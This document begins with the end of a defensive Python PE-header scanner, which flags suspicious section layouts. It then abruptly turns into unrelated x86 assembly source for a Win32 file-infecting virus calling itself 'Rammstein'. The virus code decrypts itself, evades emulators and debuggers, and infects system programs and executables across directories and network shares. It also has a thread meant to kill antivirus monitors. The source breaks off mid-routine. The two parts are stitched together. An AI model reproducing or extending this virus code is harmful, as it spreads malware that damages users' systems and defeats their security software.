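        (chars,) = struct.unpack_from("<I", pe, off + 36)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vsize": vsize,
                         "va": va, "rawsize": rawsize, "rawptr": rawptr, "chars": chars})
    return entry, file_align, sections


def section_findings(pe: bytes):
    """Header heuristics a scanner would raise on the layouts described above."""
    entry, file_align, sections = parse_pe(pe)
    findings = []
    for s in sections:
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{s['name']}: executable and writable")
        slack = s["rawsize"] - s["vsize"]  # beyond alignment padding = room for a patch
        if s["vsize"] and slack >= file_align:
            findings.append(f"{s['name']}: raw size exceeds virtual size by {slack:#x}")
    holder = [s for s in sections
              if s["va"] <= entry < s["va"] + max(s["vsize"], s["rawsize"])]
    if not holder:
        findings.append("entry point outside every section")
    else:
        s = holder[0]
        if not s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"entry point in non-executable section {s['name']}")
        if len(sections) > 1 and s is sections[-1]:
            findings.append(f"entry point in last section {s['name']}")
    return findings


def build_pe(sections, entry, file_align=0x200, sect_align=0x1000) -> bytes:
    """Constructed header-only PE32 image for exercising the checks (no code)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 16, entry)       # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)    # ImageBase
    struct.pack_into("<I", opt, 32, sect_align)  # SectionAlignment
    struct.pack_into("<I", opt, 36, file_align)  # FileAlignment
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n.encode("ascii").ljust(8, b"\0"),
                                vs, va, rs, rp, 0, 0, 0, 0, ch)
                    for n, vs, va, rs, rp, ch in sections)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + hdrs


CODE_FLAGS = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA_FLAGS = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# A normal layout: entry in .text, raw sizes padded only up to FileAlignment.
CLEAN = build_pe([(".text", 0x1000, 0x1000, 0x1000, 0x400, CODE_FLAGS),
                  (".data", 0x200, 0x2000, 0x200, 0x1400, DATA_FLAGS)], entry=0x1100)
# Constructed shapes matching the methods above: 0x600 bytes of slack in .text,
# a writable+executable last section, and the entry point moved into it.
SUSPECT = build_pe([(".text", 0x1000, 0x1000, 0x1600, 0x400, CODE_FLAGS),
                    (".data", 0x200, 0x2000, 0x200, 0x1A00, DATA_FLAGS),
                    (".rsrc", 0x3000, 0x3000, 0x3000, 0x1C00, CODE_FLAGS | IMAGE_SCN_MEM_WRITE)],
                   entry=0x3500)

if __name__ == "__main__":
    for label, image in (("clean", CLEAN), ("suspect", SUSPECT)):
        print(label, section_findings(image) or ["no findings"])
```

None of these findings is proof on its own (packers and some toolchains produce W+X or oversized sections legitimately), which is why they are listed rather than scored; the value is in running them over a baseline of known-good binaries and looking at what changes.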
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
.586p ;
.model flat, stdcall ;
;
extrn MessageBoxA:proc ;
extrn ExitProcess: proc ;
;
TRUE = 1 ;
FALSE = 0 ;
DEBUG = TRUE ;debug on?
ANTIEMU = TRUE ;anti-debugging/emulation?
JUMP = TRUE ;allocate and jump in mem?
DIRECT = TRUE ;direct action?
ANTIAV = TRUE ;anti-av feature?
APIHOOK = TRUE ;hook imported apis?
MAINTHREAD = TRUE ;launch a main thread?
PAYLOAD = TRUE ;use payload?
RANDOMIZE_ENTRY = TRUE ;randomize code sec entry?
EPO = TRUE ;Use EPO
MMX = FALSE ;
NETWORKINFECTION = TRUE ;
VIRUSNOTIFYENTRY = FALSE ;msgbox at virus start?
VIRUSNOTIFYEXIT = FALSE ;msgbox at virus end?
VIRUSNOTIFYHOOK = FALSE ;
MAINTHREADSEH = TRUE ;
THREAD1SEH = TRUE ;
THREAD2SEH = TRUE ;
THREAD3SEH = TRUE ;
THREAD4SEH = FALSE ;
THREAD5SEH = FALSE ;
THREAD6SEH = TRUE ;
CHECKSUM = TRUE ;
WE_ARE_LAST = 0 ;
RELOCATIONS_LAST = 1 ;
RESOURCES_LAST = 2 ;
NOT_AVAILABLE = 0 ;
AVAILABLE = 1 ;
METHOD_MOVE_CODE = 0 ;
METHOD_APPEND_AT_END = 1 ;
METHOD_INCREASE_LAST = 2 ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;
IF MMX ;
include mmx.inc ; MMX !
ENDIF ;
;
@endsz macro ;locate end of asciiz
local nextchar ;string
;
nextchar: ;
lodsb ;
test al, al ;
jnz nextchar ;
endm ;
;
include w32nt_lj.inc ;
include w32us_lj.inc ;
;
; Credits to jp, vecna, prizzy ;calculate crc32
mCRC32 equ 0C1A7F39Ah ;
mCRC32_init equ 09C3B248Eh ;
crc32 macro string ;
crcReg = mCRC32_init ;
irpc _x,<string> ;
ctrlByte = '&_x&' xor (crcReg and 0FFh)
crcReg = crcReg shr 8 ;
rept 8 ;
ctrlByte = (ctrlByte shr 1) xor (mCRC32 * (ctrlByte and 1))
endm ;
crcReg = crcReg xor ctrlByte ;
endm ;
dd crcReg ;
endm ;
;
noter macro string ;this NOTs a string
irpc _x,<string> ;
notbyte = not('&_x&') ;
db notbyte ;
endm ;
db not(0) ;
endm ;
;
PUSH_POP STRUCT ;
pop_edi dd ? ;helps us to pop stuff...
pop_esi dd ? ;
pop_ebp dd ? ;
pop_esp dd ? ;
pop_ebx dd ? ;
pop_edx dd ? ;
pop_ecx dd ? ;
pop_eax dd ? ;
PUSH_POP ENDS ;
;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;
.data ;
db 0 ;
;
.code ;
;
start: ;
IF DEBUG ;
jmp xxx ;
debug_start db 'Here is the start of the virus.',0 ;Really!! ;-)
xxx: ;
ENDIF ;
pushad ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
call getdelta ; Get the delta handle
;
getdelta: ;
pop ebp ;
sub ebp, offset getdelta ;
or ebp, ebp ;check if first gen
jnz no_first ;
mov [ebp+firstgen], 1 ;mark the first generation
jmp get_base ;
;
no_first: ;
mov [ebp+firstgen], 0 ;
;
get_base: ;
call getimagebase ; And the imagebase...
;
getimagebase: ;
pop eax ;
;
ourpoint: ;
sub eax, 1000h+(ourpoint-start)-1 ;before this eax equals
;imagebase+RVA(ourpoint)+
;RVA(code section)
;
mov dword ptr [ebp+imagebase], eax ;
mov dword ptr [ebp+ourimagebase], eax ;
jmp over_data ;
;
imagebase dd 00400000h ;
ourimagebase dd 0 ;
firstgen dd 0 ;
;
over_data: ;
cmp [ebp+firstgen], 1 ;
je EncryptedArea ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
call DecryptOffset ;very light internal
;decrypt module
DecryptOffset: ;no key, just ror/rol
pop esi ;
add esi, (EncryptedArea - DecryptOffset) ;
mov edi, esi ;
mov ecx, (end2-EncryptedArea) ;
;
DecryptLoop: ;
lodsb ;
mov ebx, ecx ;
inc bl ;
jp parity ;
ror al, cl ;
jmp do_decrypt ;
;
parity: ;
rol al, cl ;
;
do_decrypt: ;
stosb ;
loop DecryptLoop ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
EncryptedArea: ;
mov [ebp+delta], ebp ;save additional deltas
IF ANTIEMU ;
mov [ebp+delta2], ebp ;
ENDIF ;
mov eax, [ebp+imagebase] ;
mov dword ptr [ebp+adjust], eax ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
lea eax, [ebp+ExceptionExit] ; Setup a SEH frame
push eax ;
push dword ptr fs:[0] ;
mov fs:[0], esp ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
mov [ebp+copying], 0 ;reset our synchronization
mov [ebp+in_list], 0 ;variables
mov [ebp+free_routine], AVAILABLE ;
mov [ebp+crt_dir_flag], 3 ;
mov [ebp+apihookfinish], 0 ;
;
lea esi, [ebp+module_names] ;decrypt module names
mov ecx, module_names_length ;
call not_list ;
;
mov eax, [esp+28h] ;first let's locate the
lea edx, [ebp+kernel32_name] ;kernel32 base address
call LocateKernel32 ;
jc ReturnToHost ;
mov dword ptr [ebp+k32], eax ;
lea esi, dword ptr [ebp+kernel32apis] ;
lea edx, dword ptr [ebp+kernel32addr] ;
mov ecx, kernel32func ;
call LocateApis ;and kernel32 apis
jc ReturnToHost ;
;
lea edi, dword ptr [ebp+advapi32_name] ;locate advapi32
call LocateModuleBase ;
jc ReturnToHost ;
mov dword ptr [ebp+a32], eax ;
lea esi, dword ptr [ebp+advapi32apis] ;
lea edx, dword ptr [ebp+advapi32addr] ;
mov ecx, advapi32func ;
call LocateApis ;and the apis
jc ReturnToHost ;
;
lea edi, dword ptr [ebp+user32_name] ;locate user32
call LocateModuleBase ;
jc ReturnToHost ;
mov dword ptr [ebp+u32], eax ;
lea esi, dword ptr [ebp+user32apis] ;
lea edx, dword ptr [ebp+user32addr] ;
mov ecx, user32func ;
call LocateApis ;and its apis
jc ReturnToHost ;
;
lea edi, dword ptr [ebp+gdi32_name] ;locate gdi32
call LocateModuleBase ;
jc ReturnToHost ;
mov dword ptr [ebp+g32], eax ;
lea esi, dword ptr [ebp+gdi32apis] ;
lea edx, dword ptr [ebp+gdi32addr] ;
mov ecx, gdi32func ;
call LocateApis ;and its apis
jc ReturnToHost ;
;
lea edi, dword ptr [ebp+mpr32_name] ;locate mpr32
call LocateModuleBase ;
jc NoNetworkApis ;
mov dword ptr [ebp+m32], eax ;
lea esi, dword ptr [ebp+mpr32apis] ;
lea edx, dword ptr [ebp+mpr32addr] ;
mov ecx, mpr32func ;
call LocateApis ;and its apis
jc NoNetworkApis ;
;
mov [ebp+netapis], TRUE ;
jmp get_img ;
;
NoNetworkApis: ;
mov [ebp+netapis], FALSE ;
;
get_img: ;
lea edi, dword ptr [ebp+img32_name] ;locate and save
call LocateModuleBase ;the checksum procedure
jc no_image ;
call @checksum ;
db "CheckSumMappedFile", 0 ;
@checksum: ;
push eax ;
call [ebp+_GetProcAddress] ;
mov [ebp+checksumfile], eax ;
;
no_image: ;
lea esi, [ebp+module_names] ;recrypt names
mov ecx, module_names_length ;
call not_list ;
;
IF VIRUSNOTIFYENTRY ;
push 0 ;
call entrytext1 ;
db 'Rammstein viral code start!', 0 ;
entrytext1: ;
call entrytext2 ;
db 'Rammstein viral code start!', 0 ;
entrytext2: ;
push 0 ;
call [ebp+_MessageBoxA] ;
ENDIF ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
call smash_dropper ;kill dropper
call getversion ;get the windoze version
;
WindowsVersion OSVERSIONINFOA <SIZE OSVERSIONINFOA>;
;
getversion: ;
call [ebp+_GetVersionExA] ;
mov byte ptr [ebp+version], al ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
mov [ebp+skipper], 0 ;
IF MMX ;
pushfd ;push flags
pop eax ;get flags
bt eax, 21h ;test for mmx presence
jnc no_mmx_present ;
mov [ebp+mmx], TRUE ;set it!
jmp done_mmx ;
;
no_mmx_present: ;
mov [ebp+mmx], FALSE ;
;
done_mmx: ;
ENDIF ;
IF JUMP ;allocate some more
;
cmp [ebp+method], METHOD_MOVE_CODE ;if code is not moved
jne restore_epo ;skip memory jump
;
call [ebp+_VirtualAlloc], 0, virussize+1000h, MEM_COMMIT+MEM_RESERVE,\
PAGE_EXECUTE_READWRITE
or eax, eax ;memory
jnz no_memory_error ;
;
call fatalexit ;we cannot continue...
db "Not enough memory!", 0 ;
;
fatalexit: ;if an error occurs, then
push 0 ;simulate a fatal exit
call [ebp+_FatalAppExitA] ;
;
no_memory_error: ;
mov [ebp+memory], eax ;otherwise copy the
lea esi, [ebp+start] ;virus to memory and
mov edi, eax ;
mov ecx, virussize ;
rep movsb ;
add eax, offset resident_area - offset start;
push eax ;
ret ;continue there...
;
restore_epo: ;
IF EPO ;
mov edi, [ebp+addressofentrypoint] ;restore epo
add edi, [ebp+imagebase] ;
lea esi, [ebp+saved_code] ;
lodsd ;
stosd ;
lodsd ;
stosd ;
ENDIF ;
;
resident_area: ;
call getdelta2 ;get delta again...
;
getdelta2: ;
pop ebp ;
sub ebp, offset getdelta2 ;
mov [ebp+delta], ebp ;
IF ANTIEMU ;
mov [ebp+delta2], ebp ;
ENDIF ;
;
cmp [ebp+firstgen], 1 ;
je grunge ;
;
cmp [ebp+method], METHOD_MOVE_CODE ;check the method
jne second_method ;
;
mov esi, [ebp+codesource] ;if here, we must move
mov edi, [ebp+codedestin] ;some code back to where
add esi, [ebp+imagebase] ;it belongs...
add edi, [ebp+imagebase] ;
mov ecx, virussize ;
rep movsb ;
;
second_method: ;
;
grunge: ;
ENDIF ;
IF MAINTHREAD ;now we launch the main
lea ebx, [ebp+mainthreadid] ;thread
lea eax, [ebp+MainThread] ;
call [ebp+_CreateThread], 0, 0, eax, ebp, 0, ebx;
cmp [ebp+firstgen], 1 ;if it is the first gen
jne do_return ;then wait for it to
call [ebp+_WaitForSingleObject], eax, INFINITE ;finish
;
do_return: ;otherwise, return to host
jmp ReturnToHost ;here...
ENDIF ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MainThread proc ;
call @MainThreadDelta ;for our main thread get
@MainThreadDelta: ;the delta handle again
pop ebp ;
sub ebp, offset @MainThreadDelta ;
;
IF MAINTHREADSEH ;
lea eax, [ebp+MainExceptionExit] ; Setup a SEH frame
push eax ;
push dword ptr fs:[0] ;
mov fs:[0], esp ;
;
no_main_seh: ;
ENDIF ;
lea edx, [ebp+OurThreads] ;Prepare to create the
lea ebx, [ebp+OurThreadIds] ;threads...
lea edi, [ebp+OurThreadHandles] ;
mov ecx, 6 ;
;
create_loop: ;
mov eax, [edx] ;
add eax, ebp ;
call StartThread ;start them and set
add edx, 4 ;them
add ebx, 4 ;
add edi, 4 ;
loop create_loop ;
;
cmp [ebp+no_imports], TRUE ;
jne no_per_process_skip ;
mov [ebp+skipper], 1 ;
;
no_per_process_skip: ;
lea eax, [ebp+offset Semaphore] ;now prepare a semaphore
push eax ;to monitor their
push 31 ;execution
push 0 ;
push 0 ;
call [ebp+_CreateSemaphoreA] ;
mov [ebp+hsemaphore], eax ;
;
lea edi, [ebp+OurThreadHandles] ;and now start them...
mov ecx, 6 ;
;
resume_loop: ;
push ecx ;
push dword ptr [edi] ;
call [ebp+_ResumeThread] ;resume!
add edi, 4 ;
pop ecx ;
loop resume_loop ;
;
push FALSE ;Wait forever until all
push INFINITE ;threads finish...
push TRUE ;(if the mainthread is
lea eax, [ebp+offset OurThreadHandles] ;TRUE, by this time the
push eax ;host is already running
push 6 ;in parallel with this
call [ebp+_WaitForMultipleObjectsEx] ;thread)
;
lea eax, [ebp+test_semaphore] ;now get the last count
push eax ;of the semaphore...
push 1 ;Should be 6*5...
push [ebp+hsemaphore] ;
call [ebp+_ReleaseSemaphore] ;
;
push [ebp+hsemaphore] ;close semaphore
call [ebp+_CloseHandle] ;
;
mov eax, [ebp+test_semaphore] ;now get the value
mov ebx, offset where_to - offset jump ;calculate jump offset
sub ebx, 30 ;5*6
add eax, ebx ;and make a jump with it
add eax, offset jump ;If the value is smaller
add eax, ebp ;
jump: jmp eax ;then it should
jmp jump ;mean someone fucked with
jmp jump ;our threads and probably
jmp jump ;the execution falls here
jmp jump ;where it hangs... This
jmp jump ;will give the user the
jmp jump ;impression that he played
jmp jump ;with hot stuff...
;
where_to: ;
IF MAINTHREAD ;if we have a mainthread
db 0E9h ;we must kill it...
dd offset KillThread - $-4 ;
ELSE ;
db 0E9h ;otherwise, simply return
dd offset ReturnToHost - $-4 ;to host...
ENDIF ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
StartThread: ;
pusha ;here we create threads
call [ebp+_CreateThread], 0, 0, eax, ebp, CREATE_SUSPENDED, ebx
mov [edi], eax ;
push THREAD_PRIORITY_HIGHEST ;and set their priority
push dword ptr [ebx] ;
call [ebp+_SetThreadPriority] ;
popa ;
db 0c3h ;ret
ret ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
OurThreadIds: ;
Thread_1_id dd 0 ;Direct infector
Thread_2_id dd 0 ;Directory infector
Thread_3_id dd 0 ;AV killer
Thread_4_id dd 0 ;Anti-debugging
Thread_5_id dd 0 ;API hooker
Thread_6_id dd 0 ;Network infector
;
OurThreadHandles: ;
Thread_1_handle dd 0 ;
Thread_2_handle dd 0 ;
Thread_3_handle dd 0 ;
Thread_4_handle dd 0 ;
Thread_5_handle dd 0 ;
Thread_6_handle dd 0 ;
hsemaphore dd 0 ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;Û This Thread is the direct infector thread
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Thread_1_StartAddress proc PASCAL tdelta: dword ;
call @Thread1Delta ;I have been experiencing
@Thread1Delta: ;problems with delta pass
pop ebp ;via the parameter so I
sub ebp, offset @Thread1Delta ;decided to read it again
;
IF THREAD1SEH ;
lea eax, [ebp+Thread1Exception] ; Setup a SEH frame
push eax ;
push dword ptr fs:[0] ;
mov fs:[0], esp ;
ENDIF ;
;
IF DIRECT ;
lea esi, [ebp+offset direct_list] ;point file names in the
mov ecx, direct_list_len ;Windows directory and
call not_list ;restore names...
;
push 260d ;
call windir ;get the Windows dir.
name_ db 260d dup (0) ;
;
windir: ;
call [ebp+_GetWindowsDirectoryA] ;
lea edi, [ebp+name_] ;point the dir path
xchg eax, edx ;
lea esi, [ebp+direct_list] ;point names
inc esi ;
inc esi ;
;
direct_loop: ;
mov word ptr [edi+edx], 005Ch ;mark terminator slash
cmp byte ptr [esi], 0FFh ;was last name?
je direct_end ;
call [ebp+_lstrcat], edi, esi ;concatenate stringz
lea eax, [ebp+W32FD] ;pointer to find data
call [ebp+_FindFirstFileA], edi, eax ;find file
cmp eax, INVALID_HANDLE_VALUE ;none?
je next_direct ;
;
push edi ;
lea edi, [edi.WFD_cFileName] ;
@001: cmp [ebp+free_routine], NOT_AVAILABLE ;
je @001 ;
mov [ebp+free_routine], NOT_AVAILABLE ;
call InfectFile ;Infect it!!
pop edi ;
mov [ebp+free_routine], AVAILABLE ;
;
next_direct: ;
@endsz ;go to end of string
jmp direct_loop ;and do it again...
ENDIF ;
;
direct_end: ;
lea esi, [ebp+offset direct_list] ;point names again and
mov ecx, direct_list_len ;restore encryption
call not_list ;
;
IF THREAD1SEH ;
jmp restore_thread1_seh ;host
;
Thread1Exception: ;if we had an error we
mov esp, [esp+8] ;must restore the ESP
call DeltaRecover1 ;
DeltaRecover1: ;
pop ebp ;
sub ebp, offset DeltaRecover1 ;
;
restore_thread1_seh: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;
ENDIF ;
;
push 0 ;
push 5 ;
push [ebp+hsemaphore] ;
call [ebp+_ReleaseSemaphore] ;release the semaphore
call [ebp+_ExitThread], 0 ;
Thread_1_StartAddress endp ;
;
direct_list: ;the direct action list
IF DEBUG ;if debug is on only
noter <L> ;
noter <DGoat*.*> ;goat files will be
ELSE ;infected...
noter <L> ;
noter <Cdplayer.exe> ; Like CD music?
noter <Notepad.exe> ; Like to write stuff?
noter <Wordpad.exe> ; Like to write better?<g>
noter <Calc.exe> ; Like to calculate?
noter <DrWatson.exe> ; Fear the errors?
noter <Extrac32.exe> ; Like to extract?
noter <Mplayer.exe> ; Like mpegs?
noter <MsHearts.exe> ; Like stupid games?
noter <WinMine.exe> ; And more stupid games?
noter <Sol.exe> ; And still more stupid?
noter <SndVol32.exe> ; Like to adjust yer vol?
noter <WinHlp32.exe> ; Are you using help?
ENDIF ; Well... TOO BAD !!!! ;-)
direct_list_len = $ - offset direct_list ;
db 0FFh ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;Û This Thread is the directory infector thread
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Thread_2_StartAddress proc PASCAL tdelta: dword ;
call @Thread2Delta ;
@Thread2Delta: ;
pop ebp ;
sub ebp, offset @Thread2Delta ;
;
IF THREAD2SEH ;
lea eax, [ebp+Thread2Exception] ; Setup a SEH frame
push eax ;
push dword ptr fs:[0] ;
mov fs:[0], esp ;
ENDIF ;
;
push 0 ;Get the drive type. If
call [ebp+_GetDriveTypeA] ;it is a fixed drive
sub [ebp+crt_dir_flag], eax ;then this value = 0
;
push 260 ;Get Windows directory
call @1 ;
wdir db 260 dup(0) ;
@1: call [ebp+_GetWindowsDirectoryA] ;
;
push 260 ;Get System directory
call @2 ;
sysdir db 260 dup(0) ;
@2: call [ebp+_GetSystemDirectoryA] ;
;
call @3 ;Get current directory
crtdir db 260 dup(0) ;
@3: push 260 ;
call [ebp+_GetCurrentDirectoryA] ;
;
cmp dword ptr [ebp+crt_dir_flag], 0 ;are we on a fixed disk?
jne direct_to_windows ;
;
mov dword ptr [ebp+infections], 0FFFFh ;infect all files there
call Infect_Directory ;
;
direct_to_windows: ;
cmp [ebp+firstgen], 1 ;
je back_to_current_dir ;
;
lea eax, [ebp+offset wdir] ;Change to Windows dir.
push eax ;
call [ebp+_SetCurrentDirectoryA] ;
;
mov dword ptr [ebp+infections], 3 ;infect 3 files there
call Infect_Directory ;
;
lea eax, [ebp+offset sysdir] ;Change to System dir.
push eax ;
call [ebp+_SetCurrentDirectoryA] ;
;
mov dword ptr [ebp+infections], 3 ;infect 3 files there
call Infect_Directory ;
;
back_to_current_dir: ;
lea eax, [ebp+offset crtdir] ;Change back to crt dir.
push eax ;
call [ebp+_SetCurrentDirectoryA] ;
;
IF THREAD2SEH ;
jmp restore_thread2_seh ;host
;
Thread2Exception: ;if we had an error we
mov esp, [esp+8] ;must restore the ESP
call DeltaRecover2 ;
DeltaRecover2: ;
pop ebp ;
sub ebp, offset DeltaRecover2 ;
;
restore_thread2_seh: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;
ENDIF ;
;
push 0 ;
push 5 ;
push [ebp+hsemaphore] ;
call [ebp+_ReleaseSemaphore] ;
call [ebp+_ExitThread], 0 ;
infections dd 0 ;
crt_dir_flag dd 3 ;
;
Infect_Directory proc ;directory scanner
pusha ;
lea esi, [ebp+file_extensions] ;restore filenames
mov ecx, file_extensions_len ;
call not_list ;
inc esi ;
inc esi ;
;
find_first_file: ;
cmp byte ptr [esi], 0FFh ;last?
je done_directory ;
lea edi, [ebp+offset W32FD] ;find first!!
call [ebp+_FindFirstFileA], esi, edi ;
mov edx, eax ;
;
compare_result: ;
cmp eax, INVALID_HANDLE_VALUE ;
je next_extension ;
or eax, eax ;
je next_extension ;
push edi ;
lea edi, [edi.WFD_cFileName] ;point name...
@002: cmp [ebp+free_routine], NOT_AVAILABLE ;synchronize!!!
je @002 ;
mov [ebp+free_routine], NOT_AVAILABLE ;
call InfectFile ;infect it!
mov [ebp+free_routine], AVAILABLE ;
pop edi ;
jc find_next_file ;
dec [ebp+infections] ;
cmp [ebp+infections], 0 ;
jz done_directory ;
;
find_next_file: ;
push edx ;
call [ebp+_FindNextFileA], edx, edi ;find next
pop edx ;
jmp compare_result ;
;
next_extension: ;
@endsz ;
jmp find_first_file ;
;
done_directory: ;
lea esi, [ebp+file_extensions] ;recrypt the extensions
mov ecx, file_extensions_len ;
call not_list ;
popa ;
ret ;
Infect_Directory endp ;
;
file_extensions: ;the list with valid
IF DEBUG ;
noter <L> ;
noter <GOAT*.EXE> ;extensions
noter <GOAT*.COM> ;
noter <GOAT*.ACM> ;
noter <GOAT*.CPL> ;
noter <GOAT*.HDI> ;
noter <GOAT*.OCX> ;
noter <GOAT*.PCI> ;
noter <GOAT*.QTC> ;
noter <GOAT*.SCR> ;
noter <GOAT*.X32> ;
noter <GOAT*.CNV> ;
noter <GOAT*.FMT> ;
noter <GOAT*.OCM> ;
noter <GOAT*.OLB> ;
noter <GOAT*.WPC> ;
ELSE ;extensions
noter <L> ;
noter <*.EXE> ;normal exe
noter <*.COM> ;same
noter <*.ACM> ;
noter <*.CPL> ;control panel object
noter <*.HDI> ;heidi file
noter <*.OCX> ;windowz ocx
noter <*.PCI> ;
noter <*.QTC> ;
noter <*.SCR> ;screen saver
noter <*.X32> ;
noter <*.CNV> ;
noter <*.FMT> ;
noter <*.OCM> ;
noter <*.OLB> ;
noter <*.WPC> ;
ENDIF ;
file_extensions_len = $-offset file_extensions ;
db 0FFh ;
Thread_2_StartAddress endp ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;Û This Thread is the AV monitors and checksums killer thread
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Thread_3_StartAddress proc PASCAL tdelta: dword ;
call @Thread3Delta ;
@Thread3Delta: ;
pop ebp ;
sub ebp, offset @Thread3Delta ;
;
IF THREAD3SEH ;
